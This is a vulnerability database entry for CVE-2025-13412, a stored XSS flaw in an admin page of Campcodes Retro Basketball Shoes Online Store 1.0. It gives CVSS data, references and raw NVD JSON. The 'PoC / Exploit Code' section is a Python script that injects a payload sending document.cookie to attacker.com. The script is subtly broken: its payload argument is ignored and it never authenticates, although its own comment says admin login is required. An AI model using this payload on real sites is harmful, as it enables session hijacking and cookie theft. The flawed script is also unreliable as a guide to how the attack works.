CVE-2025-13412

Description

A vulnerability was determined in Campcodes Retro Basketball Shoes Online Store 1.0. Affected by this issue is some unknown functionality of the file /admin/admin_running.php. Executing a manipulation of the argument product_name can lead to cross site scripting. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized.

CVSS Details

CVSS Score

2.4

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:campcodes:retro_basketball_shoes_online_store:1.0:*:*:*:*:*:*:* - VULNERABLE

Campcodes Retro Basketball Shoes Online Store 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-13412 XSS PoC
# Target: Campcodes Retro Basketball Shoes Online Store 1.0
# File: /admin/admin_running.php
# Parameter: product_name

import requests
import argparse
from urllib.parse import quote

def exploit_xss(target_url, payload):
    """
    Exploit XSS vulnerability in product_name parameter
    """
    # Construct the malicious URL
    # Note: Authentication as admin is required (PR:H)
    exploit_url = f"{target_url}/admin/admin_running.php"
    
    # XSS payload - stealing cookies
    xss_payload = f"<script>fetch('http://attacker.com/log?c='+document.cookie)</script>"
    
    # Data payload with XSS in product_name
    data = {
        'product_name': xss_payload,
        'action': 'save'  # or appropriate action parameter
    }
    
    print(f"[*] Target URL: {exploit_url}")
    print(f"[*] Payload: {xss_payload}")
    
    try:
        # Send the malicious request
        response = requests.post(exploit_url, data=data, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request sent successfully")
            print("[+] XSS payload injected")
            print("[*] Wait for admin to visit the page to trigger the payload")
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

def main():
    parser = argparse.ArgumentParser(description='CVE-2025-13412 XSS Exploit')
    parser.add_argument('-u', '--url', required=True, help='Target base URL')
    parser.add_argument('-p', '--payload', default='alert("XSS")', help='XSS payload')
    args = parser.parse_args()
    
    exploit_xss(args.url, args.payload)

if __name__ == '__main__':
    main()

# Usage: python cve-2025-13412.py -u http://target.com
# Alternative payload: <img src=x onerror=alert(document.domain)>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13412
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13412
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13412/
[4] VulDB https://vuldb.com/cve/CVE-2025-13412
[5] https://github.com/laosijivul/cve/issues/1
[6] https://vuldb.com/?ctiid.332939
[7] https://vuldb.com/?id.332939
[8] https://vuldb.com/?submit.693698
[9] https://www.campcodes.com/
[10] https://github.com/laosijivul/cve/issues/1

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13412", "sourceIdentifier": "[email protected]", "published": "2025-11-19T21:15:50.037", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in Campcodes Retro Basketball Shoes Online Store 1.0. Affected by this issue is some unknown functionality of the file /admin/admin_running.php. Executing a manipulation of the argument product_name can lead to cross site scripting. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:N/I:P/A:N", "baseScore": 3.3, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 6.4, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:campcodes:retro_basketball_shoes_online_store:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "A09368E4-676B-4F86-B3BC-C9EEE1F4C280"}]}]}], "references": [{"url": "https://github.com/laosijivul/cve/issues/1", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.332939", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332939", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.693698", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.campcodes.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/laosijivul/cve/issues/1", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}